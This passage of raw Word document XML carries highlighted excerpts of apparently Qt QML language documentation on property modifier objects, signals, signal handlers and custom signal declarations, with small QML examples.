          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2513" w:name="property-modifier-objects"/>
      <w:bookmarkStart w:id="2514" w:name="_Toc483001078"/>
      <w:bookmarkStart w:id="2515" w:name="_Toc483604413"/>
      <w:bookmarkStart w:id="2516" w:name="_Toc483605633"/>
      <w:bookmarkEnd w:id="2513"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Property Modifier Objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2514"/>
      <w:bookmarkEnd w:id="2515"/>
      <w:bookmarkEnd w:id="2516"/>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Properties can </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2764" w:anchor="property-modifier-types" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property value modifier objects</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>associated with them</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for declaring an instance of a property modifier type associated with a particular property is as follows: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ag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;PropertyModifierTypeName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;propertyName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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 attributes of the object instance</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l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145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is important to note that the above syntax is in fact an</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2765" w:anchor="object-declarations" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object declaration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which will instantiate an object which acts on a pre-existing property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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Certain property modifier types may only be applicable to specific property types, however this is not enforced by the language. For example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NumberAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type provided by</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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will only animate numeric-type (such as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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</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real</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) properties. Attempting to use a</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NumberAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with non-numeric property will not result in an error, however the non-numeric property will not be animated. The behavior of a property modifier type when associated with a particular property type is defined by its implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2517" w:name="signal-attributes"/>
      <w:bookmarkStart w:id="2518" w:name="_Toc483001079"/>
      <w:bookmarkStart w:id="2519" w:name="_Toc483004053"/>
      <w:bookmarkStart w:id="2520" w:name="_Toc483604414"/>
      <w:bookmarkStart w:id="2521" w:name="_Toc483605634"/>
      <w:bookmarkEnd w:id="2517"/>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2518"/>
      <w:bookmarkEnd w:id="2519"/>
      <w:bookmarkEnd w:id="2520"/>
      <w:bookmarkEnd w:id="2521"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal is a notification from an object that some event has occurred</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: for example, a property has changed, an animation has started or stopped, or when an image has been downloaded. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2766" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, for example, has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2767" w:anchor="clicked-signal" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>clicked</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal that is emitted when the user clicks within the mouse area.</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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object can be notified through a</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2768" w:anchor="signal-handler-attributes" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whenever it a particular signal is emitted. A signal handler is declared with the syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Signal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Signal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the signal, with the first letter capitalized. The signal handler must be declared within the definition of the object that emits the signal, and the handler should contain the block of JavaScript code to be executed when the signal handler is invoked.</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For example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handler below is declared within the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2769" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object definition, and is invoked when the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2770" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is clicked, causing a console message to be printed:</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Item</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MouseArea</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anchors</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fill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parent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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        onClicked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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Click!"</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4"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2522" w:name="defining-signal-attributes"/>
      <w:bookmarkStart w:id="2523" w:name="_Toc483001080"/>
      <w:bookmarkStart w:id="2524" w:name="_Toc483604415"/>
      <w:bookmarkStart w:id="2525" w:name="_Toc483605635"/>
      <w:bookmarkEnd w:id="2522"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Signal Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2523"/>
      <w:bookmarkEnd w:id="2524"/>
      <w:bookmarkEnd w:id="2525"/>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A signal may be defined for a type in C++ by registering a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2771" w:anchor="Q_SIGNAL" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_SIGNAL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of a class which is then registered with the QML type system. Alternatively, a custom signal for an object type may be defined in an object declaration in a QML document with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">signal </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;signalName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[([&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameter name</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;[,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Attempting to declare two signals or methods with the same name in the same type block is an error. However, a new signal may reuse the name of an existing signal on the type. (This should be done with caution, as the existing signal may be hidden and become inaccessible.)</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Here are three examples of signal declarations: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Item</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signal clicked</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signal hovered</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signal actionPerformed</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> action</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var</w:t>
      </w:r>
